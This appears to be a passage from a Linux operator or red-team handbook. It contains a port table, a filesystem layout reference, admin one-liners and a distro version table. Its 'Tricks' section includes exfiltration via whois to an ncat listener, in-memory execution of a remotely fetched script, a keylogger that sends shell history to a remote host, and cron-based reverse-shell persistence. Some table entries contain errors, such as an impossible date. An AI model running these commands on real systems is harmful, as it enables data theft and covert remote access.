68 TCP bootpc Bootstrap (BOOTP) client;
Dynamic Host Control
Protocol (DHCP) clients
69 TCP tftp Trivial File Transfer
Protocol (TFTP)
70 TCP gopher Gopher Internet document
search and retrieval
71 TCP netrjs-1 Remote Job Service
72 TCP netrjs-2 Remote Job Service
73 TCP netrjs-3 Remote Job Service
73 TCP netrjs-4 Remote Job Service
79 TCP finger Finger service for user
contact information
80 TCP http HyperText Transfer Protocol
(HTTP) for World Wide Web
(WWW) services
88 TCP kerberos Kerberos network
authentication system
95 TCP supdup Telnet protocol extension
98 tcp linuxconf Linuxconf Linux
administration tool
101 TCP hostname Hostname services on SRI-NIC
machines
102 TCP iso-tsap ISO Development Environment
(ISODE) network applications
105 TCP csnet-ns Mailbox nameserver; also
used by CSO nameserver
106 poppassd Post Office Protocol
password change daemon
(POPPASSD)
107 TCP rtelnet Remote Telnet
109 TCP pop2 Post Office Protocol version
2
110 TCP POP3 Post Office Protocol version
3
111 TCP sunrpc Remote Procedure Call (RPC)
Protocol for remote command
execution, used by Network
Filesystem (NFS)
113 TCP auth Authentication and Ident
protocols
115 TCP sftp Secure File Transfer
Protocol (SFTP) services
117 TCP uucp-path Unix-to-Unix Copy Protocol
(UUCP) Path services
119 TCP nntp Network News Transfer
Protocol (NNTP) for the
USENET discussion system

135
123 TCP ntp Network Time Protocol (NTP)
137 TCP netbios-ns NETBIOS Name Service used in
Red Hat Enterprise Linux by
Samba
138 TCP netbios-dgm NETBIOS Datagram Service
used in Red Hat Enterprise
Linux by Samba
139 TCP netbios-ssn NETBIOS Session Service used
in Red Hat Enterprise Linux
by Samba
143 TCP IMAP Internet Message Access
Protocol (IMAP)
161 TCP snmp Simple Network Management
Protocol (SNMP)
162 TCP snmptrap Traps for SNMP
163 TCP cmip-man Common Management
Information Protocol (CMIP)
164 TCP cmip-agent Common Management
Information Protocol (CMIP)
174 TCP mailq MAILQ email transport queue
177 TCP xdmcp X Display Manager Control
Protocol (XDMCP)
178 TCP nextstep NeXTStep window server
179 TCP bgp Border Gateway Protocol
191 TCP prospero Prospero distributed
filesystem services
194 TCP irc Internet Relay Chat (IRC)
199 TCP smux SNMP UNIX Multiplexer
201 TCP at-rtmp AppleTalk routing
202 TCP at-nbp AppleTalk name binding
204 TCP at-echo AppleTalk echo
206 TCP at-zis AppleTalk zone information
209 TCP qmtp Quick Mail Transfer Protocol
(QMTP)
210 TCP z39.50 NISO Z39.50 database
213 TCP ipx Internetwork Packet Exchange
(IPX), a datagram protocol
commonly used in Novell
Netware environments
220 TCP IMAP3 Internet Message Access
Protocol version 3
245 TCP link LINK / 3-DNS iQuery service
347 TCP fatserv FATMEN file and tape
management server
363 TCP rsvp_tunnel RSVP Tunnel
369 TCP rpc2portmap Coda file system portmapper
370 TCP codaauth2 Coda file system
authentication services
372 TCP ulistproc UNIX LISTSERV

136
389 TCP ldap Lightweight Directory Access
Protocol (LDAP)
427 TCP svrloc Service Location Protocol
(SLP)
434 TCP mobileip-agent Mobile Internet Protocol
(IP) agent
435 TCP mobilip-mn Mobile Internet Protocol
(IP) manager
443 TCP https Secure Hypertext Transfer
Protocol (HTTP)
444 TCP snpp Simple Network Paging
Protocol
445 TCP microsoft-ds Server Message Block (SMB)
over TCP/IP
464 TCP kpasswd Kerberos password and key
changing services
465 tcp smtps Simple Mail Transfer
Protocol over Secure Sockets
Layer (SMTPS)
468 TCP photuris Photuris session key
management protocol
487 TCP saft Simple Asynchronous File
Transfer (SAFT) protocol
488 TCP gss-http Generic Security Services
(GSS) for HTTP
496 TCP pim-rp-disc Rendezvous Point Discovery
(RP-DISC) for Protocol
Independent Multicast (PIM)
services
500 TCP isakmp Internet Security
Association and Key
Management Protocol (ISAKMP)
512 TCP exec Authentication for remote
process execution
512 UDP biff [comsat] Asynchrous mail client
(biff) and service (comsat)
513 TCP login Remote Login (rlogin)
513 UDP who [whod] whod user logging daemon
514 TCP shell [cmd] Remote shell (rshell) and
remote copy (rcp) with no
logging
514 UDP syslog UNIX system logging service
515 printer [spooler] Line printer (lpr) spooler
517 UDP talk Talk remote calling service
and client
518 UDP ntalk Network talk (ntalk) remote
calling service and client
519 utime [unixtime] UNIX time (utime) protocol
520 TCP efs Extended Filename Server
(EFS)

137
520 UDP router [route, Routing Information Protocol
routed] (RIP)
521 ripng Routing Information Protocol
for Internet Protocol
version 6 (IPv6)
525 timed [timeserver] Time daemon (timed)
526 TCP tempo [newdate] Tempo
530 TCP courier [rpc] Courier Remote Procedure
Call (RPC) protocol
531 TCP conference [chat] Internet Relay Chat
532 netnews Netnews newsgroup service
533 UDP netwall Netwall for emergency
broadcasts
535 TCP iiop Internet Inter-Orb Protocol
(IIOP)
538 TCP gdomap GNUstep Distributed Objects
Mapper (GDOMAP)
540 TCP uucp [uucpd] UNIX-to-UNIX copy services
543 TCP klogin Kerberos version 5 (v5)
remote login
544 TCP kshell Kerberos version 5 (v5)
remote shell
546 TCP dhcpv6-client Dynamic Host Configuration
Protocol (DHCP) version 6
client
547 TCP dhcpv6-server Dynamic Host Configuration
Protocol (DHCP) version 6
Service
548 afpovertcp Appletalk Filing Protocol
(AFP) over Transmission
Control Protocol (TCP)
554 TCP rtsp Real Time Stream Control
Protocol (RTSP)
556 remotefs Brunhoff’s Remote Filesystem
[rfs_server, rfs] (RFS)
563 TCP nntps Network News Transport
Protocol over Secure Sockets
Layer (NNTPS)
565 TCP whoami whoami user ID listing
587 TCP submission Mail Message Submission
Agent (MSA)
610 TCP npmp-local Network Peripheral
Management Protocol (NPMP)
local / Distributed Queueing
System (DQS)
611 TCP npmp-gui Network Peripheral
Management Protocol (NPMP)
GUI / Distributed Queueing
System (DQS)

138
612 TCP hmmp-ind HyperMedia Management
Protocol (HMMP) Indication /
DQS
616 tcp gii Gated (routing daemon)
Interactive Interface
631 TCP ipp Internet Printing Protocol
(IPP)
636 TCP ldaps Lightweight Directory Access
Protocol over Secure Sockets
Layer (LDAPS)
674 TCP acap Application Configuration
Access Protocol (ACAP)
694 TCP ha-cluster Heartbeat services for High-
Availability Clusters
749 TCP kerberos-adm Kerberos version 5 (v5)
‘kadmin’ database
administration
750 TCP kerberos-iv Kerberos version 4 (v4)
services
765 TCP webster Network Dictionary
767 TCP phonebook Network Phonebook
808 omirr [omirrd] Online Mirror (Omirr) file
mirroring services
871 tcp supfileserv Software Upgrade Protocol
(SUP) server
873 TCP rsync rsync file transfer services
901 tcp swat Samba Web Administration
Tool (SWAT)
953 rndc Berkeley Internet Name
Domain version 9 (BIND 9)
remote configuration tool
992 TCP telnets Telnet over Secure Sockets
Layer (TelnetS)
993 TCP IMAPS Internet Message Access
Protocol over Secure Sockets
Layer (IMAPS)
994 TCP ircs Internet Relay Chat over
Secure Sockets Layer (IRCS)
995 TCP POP3s Post Office Protocol version
3 over Secure Sockets Layer
(POP3S)
1080 socks SOCKS network application
proxy services
1127 tcp supfiledbg Software Upgrade Protocol
(SUP) debugging
1178 tcp skkserv Simple Kana to Kanji (SKK)
Japanese input server
1236 bvcontrol [rmtcfg] Remote configuration server
for Gracilis Packeten
network switches[a]

139
1300 h323hostcallsc H.323 telecommunication Host
Call Secure
1313 tcp xtel French Minitel text
information system
1433 ms-sql-s Microsoft SQL Server
1434 ms-sql-m Microsoft SQL Monitor
1494 ica Citrix ICA Client
1512 wins Microsoft Windows Internet
Name Server
1524 ingreslock Ingres Database Management
System (DBMS) lock services
1525 prospero-np Prospero non-privileged
1529 tcp support [prmsd, GNATS bug tracking system
gnatsd]
1645 datametrics [old- Datametrics / old radius
radius] entry
1646 sa-msg-port sa-msg-port / old radacct
[oldradacct] entry
1649        kermit                     Kermit file transfer and management service
1701        l2tp [l2f]                 Layer 2 Tunneling Protocol (L2TP) / Layer 2 Forwarding (L2F)
1718        h323gatedisc               H.323 telecommunication Gatekeeper Discovery
1719        h323gatestat               H.323 telecommunication Gatekeeper Status
1720        h323hostcall               H.323 telecommunication Host Call setup
1758        tftp-mcast                 Trivial FTP Multicast
1759  UDP   mtftp                      Multicast Trivial FTP (MTFTP)
1789        hello                      Hello router communication protocol
1812        radius                     Radius dial-up authentication and accounting services
1813        radius-acct                Radius Accounting
1911        mtp                        Starlight Networks Multimedia Transport Protocol (MTP)
1985        hsrp                       Cisco Hot Standby Router Protocol
1986        licensedaemon              Cisco License Management Daemon
1997        gdp-port                   Cisco Gateway Discovery Protocol (GDP)
2003  tcp   cfinger                    GNU finger
2049        nfs [nfsd]                 Network File System (NFS)
2102        zephyr-srv                 Zephyr distributed messaging Server
2103        zephyr-clt                 Zephyr client
2104        zephyr-hm                  Zephyr host manager
2150        ninstall                   Network Installation Service
2401        cvspserver                 Concurrent Versions System (CVS) client/server operations
2430  TCP   venus                      Venus cache manager for Coda file system (codacon port)
2430  UDP   venus                      Venus cache manager for Coda file system (callback/wbc interface)
2431  TCP   venus-se                   Venus Transmission Control Protocol (TCP) side effects
2431  UDP   venus-se                   Venus User Datagram Protocol (UDP) side effects
2432  UDP   codasrv                    Coda file system server port
2433  TCP   codasrv-se                 Coda file system TCP side effects
2433  UDP   codasrv-se                 Coda file system UDP SFTP side effect
2600        hpstgmgr [zebrasrv]        Zebra routing
2601        discp-client [zebra]       discp client; Zebra integrated shell
2602        discp-server [ripd]        discp server; Routing Information Protocol daemon (ripd)
2603        servicemeter [ripngd]      Service Meter; RIP daemon for IPv6
2604        nsc-ccs [ospfd]            NSC CCS; Open Shortest Path First daemon (ospfd)
2605        nsc-posa                   NSC POSA; Border Gateway Protocol daemon (bgpd)
2606        netmon [ospf6d]            Dell Netmon; OSPF for IPv6 daemon (ospf6d)
2809        corbaloc                   Common Object Request Broker Architecture (CORBA) naming service locator
2988        afbackup                   afbackup client-server backup system
3128  tcp   squid                      Squid Web proxy cache
3130        icpv2                      Internet Cache Protocol version 2 (v2); used by Squid proxy caching server
3306        mysql                      MySQL database service
3346        trnsprntproxy              Transparent proxy
3455        prsvp                      RSVP port
4011        pxe                        Pre-execution Environment (PXE) service
4321        rwhois                     Remote Whois (rwhois) service
4444        krb524                     Kerberos version 5 (v5) to version 4 (v4) ticket translator
4557  tcp   fax                        FAX transmission service (old service)
4559  tcp   hylafax                    HylaFAX client-server protocol (new service)
5002        rfe                        Radio Free Ethernet (RFE) audio broadcasting system
5232        sgi-dgl                    SGI Distributed Graphics Library
5308        cfengine                   Configuration engine (Cfengine)
5354        noclog                     NOCOL network operation center logging daemon (noclogd)
5355        hostmon                    NOCOL network operation center host monitoring
5432        postgres                   PostgreSQL database
5680  tcp   canna                      Canna Japanese character input interface
5999        cvsup [CVSup]              CVSup file transfer and update tool
6000  TCP   x11 [X]                    X Window System services
6010  tcp   x11-ssh-offset             Secure Shell (SSH) X11 forwarding offset
6667        ircd                       Internet Relay Chat daemon (ircd)
7000        afs3-fileserver            Andrew File System (AFS) file server
7001        afs3-callback              AFS port for callbacks to cache manager
7002        afs3-prserver              AFS user and group database
7003        afs3-vlserver              AFS volume location database
7004        afs3-kaserver              AFS Kerberos authentication service
7005        afs3-volser                AFS volume management server
7006        afs3-errors                AFS error interpretation service
7007        afs3-bos                   AFS basic overseer process
7008        afs3-update                AFS server-to-server updater
7009        afs3-rmtsys                AFS remote cache manager service
7100  tcp   xfs                        X Font Server (XFS)
7666  tcp   tircproxy                  Tircproxy IRC proxy service
8008        http-alt                   Hypertext Transfer Protocol (HTTP) alternate
8080        webcache                   World Wide Web (WWW) caching service
8081        tproxy                     Transparent Proxy
9100  tcp   jetdirect [laserjet, hplj] Hewlett-Packard (HP) JetDirect network printing service
9359        mandelspawn [mandelbrot]   Parallel mandelbrot spawning program for the X Window System
9876        sd                         Session Director for IP multicast conferencing
10080       amanda                     Advanced Maryland Automatic Network Disk Archiver (Amanda) backup services
10081       kamanda                    Amanda backup service over Kerberos
10082 tcp   amandaidx                  Amanda index server
10083 tcp   amidxtape                  Amanda tape server
11371       pgpkeyserver               Pretty Good Privacy (PGP) / GNU Privacy Guard (GPG) public keyserver
11720       h323callsigalt             H.323 Call Signal Alternate
13720       bprd                       Veritas NetBackup Request Daemon (bprd)
13721       bpdbm                      Veritas NetBackup Database Manager (bpdbm)
13722       bpjava-msvc                Veritas NetBackup Java / Microsoft Visual C++ (MSVC) protocol
13724       vnetd                      Veritas network utility
13782       bpcd                       Veritas NetBackup
13783       vopied                     Veritas VOPIE authentication daemon
20011       isdnlog                    Integrated Services Digital Network (ISDN) logging system
20012       vboxd                      ISDN voice box daemon (vboxd)
22273       wnn6 [wnn4]                Kana/Kanji conversion system
22289 tcp   wnn4_Cn                    cWnn Chinese input system
22305 tcp   wnn4_Kr                    kWnn Korean input system
22321 tcp   wnn4_Tw                    tWnn Chinese input system (Taiwan)
24554       binkp                      Binkley TCP/IP Fidonet mailer daemon
26000       quake                      Quake (and related) multi-player game servers
26208       wnn6-ds                    Wnn6 Kana/Kanji server
27374       asp                        Address Search Protocol
33434       traceroute                 Traceroute network tracking tool
60177       tfido                      Ifmail FidoNet compatible mailer service
60179       fido                       FidoNet electronic mail and news network

REFERENCE:
[Link]

LINUX_Structure
ALL INFORMATIONAL Linux

DIRECTORY DESCRIPTIONS
/               Primary hierarchy root and root directory of the entire file system hierarchy.
/bin            Essential command binaries that need to be available in single user mode; for all users, e.g., cat, ls, cp.
/boot           Boot loader files, e.g., kernels, initrd.
/dev            Device files, e.g., /dev/null, /dev/disk0, /dev/sda1, /dev/tty, /dev/random.
/etc            Host-specific system-wide configuration files.
/etc/opt        Configuration files for add-on packages that are stored in /opt.
/etc/sgml       Configuration files, such as catalogs, for software that processes SGML.
/etc/X11        Configuration files for the X Window System, version 11.
/etc/xml        Configuration files, such as catalogs, for software that processes XML.
/home           Users' home directories, containing saved files, personal settings, etc.
/lib            Libraries essential for the binaries in /bin and /sbin.
/lib<qual>      Alternative format essential libraries. Such directories are optional, but if they exist, they have some requirements.
/media          Mount points for removable media such as CD-ROMs.
/mnt            Temporarily mounted filesystems.
/opt            Optional application software packages.
/proc           Virtual filesystem providing process and kernel information as files. In Linux, corresponds to a procfs mount. Generally automatically generated and populated by the system, on the fly.
/root           Home directory for the root user.
/run            Run-time variable data: information about the running system since last boot, e.g., currently logged-in users and running daemons. Files under this directory must be either removed or truncated at the beginning of the boot process; but this is not necessary on systems that provide this directory as a temporary filesystem (tmpfs).
/sbin           Essential system binaries, e.g., fsck, init, route.
/srv            Site-specific data served by this system, such as data and scripts for web servers, data offered by FTP servers, and repositories for version control systems (appeared in FHS-2.3 in 2004).
/sys            Contains information about devices, drivers, and some kernel features.
/tmp            Temporary files (see also /var/tmp). Often not preserved between system reboots, and may be severely size restricted.
/usr            Secondary hierarchy for read-only user data; contains the majority of (multi-)user utilities and applications.
/usr/bin        Non-essential command binaries (not needed in single user mode); for all users.
/usr/include    Standard include files.
/usr/lib        Libraries for the binaries in /usr/bin and /usr/sbin.
/usr/lib<qual>  Alternative format libraries, e.g. /usr/lib32 for 32-bit libraries on a 64-bit machine (optional).
/usr/local      Tertiary hierarchy for local data, specific to this host. Typically has further subdirectories, e.g., bin, lib, share.
/usr/sbin       Non-essential system binaries, e.g., daemons for various network services.
/usr/share      Architecture-independent (shared) data.
/usr/src        Source code, e.g., the kernel source code with its header files.
/usr/X11R6      X Window System, Version 11, Release 6 (up to FHS-2.3, optional).
/var            Variable files: files whose content is expected to continually change during normal operation of the system, such as logs, spool files, and temporary e-mail files.
/var/cache      Application cache data. Such data are locally generated as a result of time-consuming I/O or calculation. The application must be able to regenerate or restore the data. The cached files can be deleted without loss of data.
/var/lib        State information. Persistent data modified by programs as they run, e.g., databases, packaging system metadata, etc.
/var/lock       Lock files. Files keeping track of resources currently in use.
/var/log        Log files. Various logs.
/var/mail       Mailbox files. In some distributions, these files may be located in the deprecated /var/spool/mail.
/var/opt        Variable data from add-on packages that are stored in /opt.
/var/run        Run-time variable data. This directory contains system information data describing the system since it was booted.
/var/spool      Spool for tasks waiting to be processed, e.g., print queues and outgoing mail queue.
/var/spool/mail Deprecated location for users' mailboxes.
/var/tmp        Temporary files to be preserved between reboots.

IMPORTANT FILE LOCATIONS
/boot/vmlinuz : The Linux kernel file.
/dev/hda : Device file for the first IDE HDD (Hard Disk Drive)
/dev/hdc : Device file for the IDE CD-ROM, commonly
/dev/null : A pseudo device
/etc/bashrc : System defaults and aliases used by the bash shell.
/etc/crontab : Cron runs commands at a predefined time interval.
/etc/exports : Information on the file systems available on the network.
/etc/fstab : Information on disk drives and their mount points.
/etc/group : Information on security groups.
/etc/[Link] : grub bootloader configuration file.
/etc/init.d : Service startup scripts.
/etc/[Link] : lilo bootloader configuration file.
/etc/hosts : Information on IPs and corresponding hostnames.
/etc/[Link] : Hosts allowed access to services on the local host.
/etc/[Link] : Hosts denied access to services on the local host.
/etc/inittab : INIT process and interactions at various run levels.
/etc/issue : Allows editing of the pre-login message.
/etc/[Link] : Configuration files for system modules.
/etc/motd : Message Of The Day
/etc/mtab : Currently mounted block devices.
/etc/passwd : System users with password hash redacted.
/etc/printcap : Printer information
/etc/profile : Bash shell defaults
/etc/profile.d : Application scripts, executed after login.
/etc/rc.d : Information about run-level-specific scripts.
/etc/rc.d/init.d : Run level initialisation scripts.
/etc/[Link] : Domain Name Servers (DNS) being used by the system.
/etc/securetty : Terminal list where root login is possible.
/etc/shadow : System users with password hash.
/etc/skel : Script that populates a new user's home directory.
/etc/termcap : ASCII file that defines the behavior of the terminal.
/etc/X11 : Configuration files of the X Window System.
/usr/bin : Normal user executable commands.
/usr/bin/X11 : Binaries of the X Window System.
/usr/include : Contains include files used by C programs.
/usr/share : Shared directories of man files, info files, etc.
/usr/lib : Library files required during program compilation.
/usr/sbin : Commands for the super user, for system administration.
/proc/cpuinfo : CPU information
/proc/filesystems : File-system information being used currently.
/proc/interrupts : Information about the current interrupts.
/proc/ioports : All Input/Output addresses used by devices.
/proc/meminfo : Memory usage information.
/proc/modules : Currently used kernel modules.
/proc/mounts : Mounted file-system information.
/proc/stat : Detailed statistics of the current system.
/proc/swaps : Swap file information.
/proc/version : Linux version information.
/var/log/auth* : Log of authorization login attempts.
/var/log/lastlog : Log of last boot process.
/var/log/messages : Log of messages produced by the syslog daemon.
/var/log/wtmp : Login time and duration of each user on the system.

REFERENCE:
[Link]
[Link]EWPRz2770K4/edit
[Link]paths-explained/

LINUX_Tricks
ALL MISC Linux

EXFIL TRICK
WHOIS Exfil Files
First: Ncat listen & tee to file
ncat -k -l -p 4444 | tee files.b64

Next: Compress, base64, xargs whois to Ncat listener
tar czf - /bin/* | base64 | xargs -I bits timeout 0.03 whois -h [Link] -p 4444 bits

Finally: Reconstruct files back
cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv

ONE-LINERS
Linux in-memory exec one-liner
This command executes a bash script in memory, fetched from a remote
server. Works even on filesystems mounted noexec.
bash -c 'CMD="`wget -qO- [Link]`" && eval "$CMD"'

Bash IP/Port Scanner
for i in {1..65535};do (echo </dev/tcp/<TargetIPAddr>/$i) &>/dev/null && echo -e "\n[+] Open port at:\t$i" || (echo -n "."&&exit 1);done

Bash one-liner screenshot web services running on an IP range
IP="192.168.0"; for p in '80' '443'; do for i in $(seq 0 5); do TAKE_SS=$(cutycapt --url=$IP.$i:$p --out=$IP.$i:$[Link]); done; done

Add to .bashrc - Log history of commands with timestamp
PS1='[`date +"%d-%b-%y %T"`] > '
test "$(ps -ocommand= -p $PPID | awk '{print $1}')" == 'script' || (script -f $HOME/logs/$(date +"%d-%b-%y_%H-%M-%S")_shell.log)

One-Lin3r Terminal Aid
Gives you one-liners that aid in penetration testing operations,
privilege escalation and more. [Link]
[Link]

Bash Keylogger
PROMPT_COMMAND='history -a; tail -n1 ~/.bash_history > /dev/tcp/[Link]/9000'

One liner to add persistence on a box via cron
echo "* * * * * /bin/nc [Link] 1234 -e /bin/bash" > cron && crontab cron
and on [Link]:
nc -lvp 1234

One-liner to check if the contents of a directory changed:


find . -type f | sort | xargs sha1sum | sha1sum | awk '{print $1}'
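The one-liner above yields a single hash, so it only tells you that something in the tree changed. The script below is an added example (not from the handbook) that keeps a per-file baseline and reports which files were added, removed or modified, the way a host integrity check would. It assumes a POSIX shell, either sha256sum or shasum on the PATH, and paths without whitespace (awk splits fields on it); the sample tree it checks is constructed inside a temporary directory.

```shell
#!/bin/sh
# Added example, not from the handbook: baseline-and-compare integrity check.
# Assumption: file paths contain no whitespace (awk field splitting).

# hash_file FILE -> "<sha256>  FILE"; coreutils first, Perl shasum as fallback
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"
    else shasum -a 256 "$1"; fi
}

# make_manifest DIR -> one "<sha256>  ./relative/path" line per regular file,
# sorted by path so two manifests of an unchanged tree are byte-identical.
make_manifest() {
    ( cd "$1" && find . -type f | LC_ALL=C sort | while IFS= read -r f; do
          hash_file "$f"
      done )
}

# compare_manifests BASELINE CURRENT -> prints ADDED/CHANGED/REMOVED lines;
# returns 0 when the tree is unchanged, 1 when any difference was found.
compare_manifests() {
    report=$(awk '
        FILENAME == ARGV[1] { base[$2] = $1; next }   # load baseline hashes
        !($2 in base)       { print "ADDED   " $2; next }
        base[$2] != $1      { print "CHANGED " $2 }
                            { delete base[$2] }       # present in both
        END { for (p in base) print "REMOVED " p }    # left over = deleted
    ' "$1" "$2" | LC_ALL=C sort)
    [ -z "$report" ] && return 0
    printf '%s\n' "$report"
    return 1
}

# demo_drift: constructed sample tree, baseline, then simulated drift
# (one file edited, one added, one deleted). Returns compare_manifests' status.
demo_drift() {
    work=$(mktemp -d) || return 2
    mkdir -p "$work/etc"
    printf 'root:x:0:0:root:/root:/bin/sh\n' > "$work/etc/passwd"
    printf 'nameserver 127.0.0.53\n'          > "$work/etc/resolv.conf"
    make_manifest "$work" > "$work.baseline"

    printf 'nameserver 192.0.2.1\n'           > "$work/etc/resolv.conf"  # edited
    printf 'Authorised use only\n'            > "$work/etc/motd"         # added
    rm -f "$work/etc/passwd"                                             # removed
    make_manifest "$work" > "$work.current"

    compare_manifests "$work.baseline" "$work.current" && status=0 || status=$?
    rm -rf "$work" "$work.baseline" "$work.current"
    return "$status"
}

# Run with --demo to print the three report lines for the constructed tree.
if [ "${1:-}" = "--demo" ]; then
    demo_drift
fi
```

In practice the baseline is taken right after provisioning and stored off-host (or at least read-only), and the compare runs from cron; the non-zero exit status is what an alerting job keys on.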

Shodan Bash One-Liner to Search
for domain in $(curl <raw target domains file>| unfurl -u format '%r');do shodan search <INSERT_VULN_HERE> "ssl:$domain" | awk '{print $1}' | aquatone;done

One-liner for grabbing all of the IP addresses from any ASN:
whois -h [Link] -- '-i origin AS36459' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq

Show 10 Largest Open Files
lsof / | awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | sort -n -u | tail

Generate a sequence of numbers
echo {01..10}

Displays the quantity of connections to port 80 on a per IP basis
clear;while x=0; do clear;date;echo "";echo " [Count] | [IP ADDR]";echo "-------------------";netstat -np|grep :80|grep -v LISTEN|awk '{print $5}'|cut -d: -f1|uniq -c; sleep 5;done

Nmap scan every interface that is assigned an IP
ifconfig -a | grep -Po '\b(?!255)(?:\d{1,3}\.){3}(?!255)\d{1,3}\b' | xargs nmap -A -p0-

Rename all items in a directory to lower case
for i in *; do mv "$i" "${i,,}"; done

Find all log files modified 24 hours ago, and zip them
find . -type f -mtime +1 -name "*.log" -exec zip -m {}.zip {} \; >/dev/null

List IP addresses connected to your server on port 80
netstat -tn 2>/dev/null | grep :80 | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr | head

Change the encoding of all files in a directory and subdirectories
find . -type f -name '*.java' -exec sh -c 'iconv -f cp1252 -t utf-8 "$1" > converted && mv converted "$1"' -- {} \;

Tree-like output in ls
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'

Find all files recursively with specified string in the filename and output any lines found containing a different string.
find . -name '*conf*' -exec grep -Hni 'matching_text' {} \; > matching_text.[Link]

Extract your external IP address using dig
dig +short [Link] @[Link]

Shred & Erase without shred
FN=[Link]; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom >"${FN}"; rm -f "${FN}"

REFERENCE:
[Link]liner-758352f9aece
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]

LINUX_Versions
ALL INFORMATIONAL LINUX

All current distros and versions of Linux.

DISTRIBUTION | DATE | CURRENT | LAST | FORK
Alpine Linux | 2006 | 3.11.3 | 6/13/19 | LEAF Project
ALT Linux | 2001 | 8.2 | 7/10/13 | Mandrake Linux
antiX | 2007 | 17.4.1 | 8/24/17 | Debian, MEPIS
ArchBang | 2011 | Rolling | ? | Arch Linux (UKM Edition)
Arch Linux | 2002 | Rolling | Rolling | inspired from CRUX
BLAG | 2002 | 140k | 5/4/11 | Fedora
Bodhi Linux | 2011 | 5.0.0 | 8/22/18 | Debian, Ubuntu
Canaima | 2007 | 6 | 3/19/18 | Debian, Ubuntu
CentOS | 2003 | 8.0-1905 | 10/16/19 | Red Hat Enterprise Linux (RHEL)
Chakra | 2010 | Rolling | ? | Arch Linux
Chrome OS | 2009 | 75.0.3770.129 | 7/9/19 | Chromium OS
ClearOS | 2000 | 7.6.0 | 5/9/19 | RHEL, CentOS
CrunchBang Linux | 2008 | 11 | 5/6/13 | Debian
Damn Small Linux | 2003 | 4.4.10 | 11/18/08 | Debian, Knoppix
Debian | 1993 | 10.2 | 11/16/19 | Softlanding Linux System (SLS)
Debian Edu | 2004 | 9.0+edu0 | 6/18/17 | Debian
Devuan | 2016 | 2.0.0 | 9/16/18 | Debian
Deepin | 2004 | 15.11 | 7/5/19 | Debian (current), Ubuntu, Morphix (formerly)
Dragora GNU/Linux-Libre | 2009 | 3.0-alpha2 | 9/28/18 | inspired from Slackware
dyne:bolic | 2005 | 3.0.0 | 9/8/11 | Debian
Elementary OS | 2011 | 5 | 10/16/18 | Ubuntu, Debian
ELinOS | 1999 | 6.2 | 10/1/17 | –
Emdebian Grip | 2009 | 3.1 | 6/15/13 | Debian
EndeavourOS | 2019 | Rolling | 7/15/19 | Arch Linux
Fedora | 2003 | 31 | 10/29/19 | Red Hat Linux
Freespire | 2001 | 4.8 | 12/20/18 | Ubuntu
Gentoo Linux | 2002 | Rolling | Rolling | Enoch Linux
Guix | 2012 | 1.0.1 | 5/2/19 | –
gNewSense | 2006 | 4.0 (Ucclia) | 5/2/16 | Debian
gnuLinEx | 2002 | LinEx 2013 | 2/11/13 | Debian
Grml | 2005 | 2018.12 | 12/31/18 | Debian
Hyperbola GNU/Linux-libre | 2017 | 0.3 | 9/23/19 | Arch Linux
Instant WebKiosk | 2012 | 16 | 4/5/17 | Debian
Kali Linux | 2013 | 2019.4 | 5/21/19 | Debian
Knoppix | 2000 | 8.6 | 8/8/19 | Debian
Kodibuntu | 2008 | ? | ? | Debian, Ubuntu
Korora | 2005 | 26 | 9/16/17 | Fedora
LibreCMC | 2010 | 1.4.8 | 6/30/19 | Merged from LibreWRT
Linspire | 2001 | 7.0 SP1 | 4/8/18 | Ubuntu
Linux Mint | 2006 | 19.3 | 8/2/19 | Debian (LMDE), Ubuntu (LTS versions)
Linux Lite | 2012 | 4.4 | 11/1/18 | Ubuntu
Mageia | 2010 | 7.1 | 7/1/19 | Mandriva Linux
Mandriva Linux | 1998 | 2011 | 8/28/11 | Red Hat Linux
Manjaro Linux | 2012 | Rolling | Rolling | Arch Linux
MEPIS | 2003 | 11.9.90 | ? | Debian
Musix GNU+Linux | 2008 | 3.0.1 | 3/13/14 | Debian
Netrunner | 2009 | 2018.08 | 3/11/18 | Debian, Manjaro/Arch
NixOS | 2003 | 19.09 | 5/2/19 | –
Novell Open Enterprise Server | 2003 | OES 2018 SP1 | ? | SUSE Linux Enterprise Server
OpenELEC | 2011 | 8.0.4 | 6/4/17 | Kodi
openSUSE | 2006 | Leap 15.1 | 5/22/19 | –
OpenWrt | 2007 | 18.06.4 | 7/1/19 | –
OpenMandriva Lx | 2013 | 4 | 5/12/19 | Mandriva Linux
Oracle Linux | 2006 | 7.6 | 11/7/18 | Red Hat Enterprise Linux (RHEL)
Parabola GNU/Linux-libre | 2009 | Rolling | 5/28/17 | Arch Linux
Pardus | 2005 | 17.5 | 11/3/18 | Gentoo (2011.2), Debian
Parsix | 2005 | 8.15 | 1/25/17 | Debian
Parted Magic | ? | 2019_12_24 | 2019-12-34 | -
PCLinuxOS | 2003 | 2019.06 | 6/16/19 | Mandriva Linux
Pop! OS | 2017 | 19.1 | 10/19/19 | Ubuntu
Pentoo | 2005 | 2019.1 | 1/17/19 | Gentoo Linux
Porteus | 2010 | 4 | 4/29/18 | Slackware
Puppy Linux | 2003 | 8 | 4/11/19 | inspired by Vector Linux
Qubes OS | 2012 | 4.0.1 | 1/9/19 | Xen and Fedora
Red Hat Enterprise Linux | 2002 | 8 | 5/7/19 | Red Hat Linux, Fedora
Red Hat Linux | 1995 | 9 | 3/31/03 | –
ROSA | 2011 | R11 | 3/15/19 | Mandriva
Rocks Cluster Distribution | 2000 | 7 | 12/1/15 | Red Hat Linux
Sabayon Linux | 2005 | 19.03 | 3/31/19 | Gentoo Linux
Salix OS | 2009 | 14.2 | 8/29/16 | Slackware
Scientific Linux | 2004 | 7.6 | 12/3/18 | Red Hat Linux, Red Hat Enterprise Linux (RHEL)
Slackware | 1993 | 14.2 | 6/30/16 | Softlanding Linux System (SLS)
Slax | 2002 | 9.9.1 | 6/17/19 | Debian, Slackware (until Slax 9)
SliTaz GNU/Linux | 2008 | Rolling | 12/3/17 | Ind
Solus | 2005 | Rolling | 8/15/17 | –
SolydXK | 2013 | 201902 | 3/3/19 | Debian
